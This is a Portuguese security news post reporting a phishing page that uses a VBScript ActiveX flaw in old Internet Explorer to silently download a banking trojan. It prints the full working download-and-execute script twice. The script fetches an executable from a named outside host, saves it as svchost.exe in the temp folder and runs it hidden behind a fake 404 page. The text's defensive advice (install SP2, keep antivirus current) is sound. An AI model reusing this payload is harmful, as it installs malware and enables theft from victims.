Total Security - www.totalsecurity.com.br
Código em ajax executa malware
Exposto código em ajax usado por phishers, que baixa e instala malware no computador da vítima.Revelado por meio de fonte confidencial, código em ajax que possibilita o download e instalação de um malware classificado como W32/new-malware!Maximus variante do Win32/Bancos.Variant!, que tal caminho para download se encontrava em "http://grupo-arroba.by.ru/grupo.exe". Durante testes da TotalSecurity, se constatou que tal código estava em funcionamento em mãos de phishers desde o começo de março.
Durante testes da nossa equipe foi revelado que tal código só funciona em sistemas sem o service pack 2 do windows xp; além de não funcionar em browsers como opera e firefox. Mas mesmo assim não indica uma falha no microsoft internet explorer, já que utiliza falha no ActiveX para criar instâncias de WScript.Shell e ADODB.Stream.
Recomendamos, para quem usa o sistema operacional windows, atualizá-lo para o pacote SP2, além de sempre manter o antivírus atualizado e evitar entrar em sites suspeitos.
*O código completo a seguir:
[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
` em erro vai para o próximo
‘ o arquivo deve estar na mesma página
dl = “http://grupo-arroba.by.ru/grupo.exe”
‘ cria objeto adodbstream
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”)
S.type = 1
‘ requesição xml
str6=”GET”
x.Open str6, dl, False
x.Send
‘ pega diretório temporário e cria nome de destino
fname1=”svchost.exe”
set F = df.createobject(”Scripting.FileSystemObject”,”)
set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
‘ abre stream adodb e cria índice de requisição para o arquivo
‘ como o código vbs dl+exec
S.write x.responseBody
‘ salva como bandeira CreateOverwrite
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,”)
Q.ShellExecute fname1,”,”,”open”,0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center][embed xsrc=” pluginspage=” type=”application/x-shockwave-flash” width=”550″ height=”290″] [/embed]
[!– [script]location.href=’http://google.com’[/script] –]
[/body]
[/html]
Durante testes da nossa equipe foi revelado que tal código só funciona em sistemas sem o service pack 2 do windows xp; além de não funcionar em browsers como opera e firefox. Mas mesmo assim não indica uma falha no microsoft internet explorer, já que utiliza falha no ActiveX para criar instâncias de WScript.Shell e ADODB.Stream.
Recomendamos, para quem usa o sistema operacional windows, atualizá-lo para o pacote SP2, além de sempre manter o antivírus atualizado e evitar entrar em sites suspeitos.
*O código completo a seguir:
[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
` em erro vai para o próximo
‘ o arquivo deve estar na mesma página
dl = “http://grupo-arroba.by.ru/grupo.exe”
‘ cria objeto adodbstream
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”)
S.type = 1
‘ requesição xml
str6=”GET”
x.Open str6, dl, False
x.Send
‘ pega diretório temporário e cria nome de destino
fname1=”svchost.exe”
set F = df.createobject(”Scripting.FileSystemObject”,”)
set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
‘ abre stream adodb e cria índice de requisição para o arquivo
‘ como o código vbs dl+exec
S.write x.responseBody
‘ salva como bandeira CreateOverwrite
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,”)
Q.ShellExecute fname1,”,”,”open”,0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center][embed xsrc=” pluginspage=” type=”application/x-shockwave-flash” width=”550″ height=”290″] [/embed]
[!– [script]location.href=’http://google.com’[/script] –]
[/body]
[/html]
Fonte:
Eu escrevi
URL Fonte: http://www.totalsecurity.com.br/noticia/1542/visualizar/
Comentários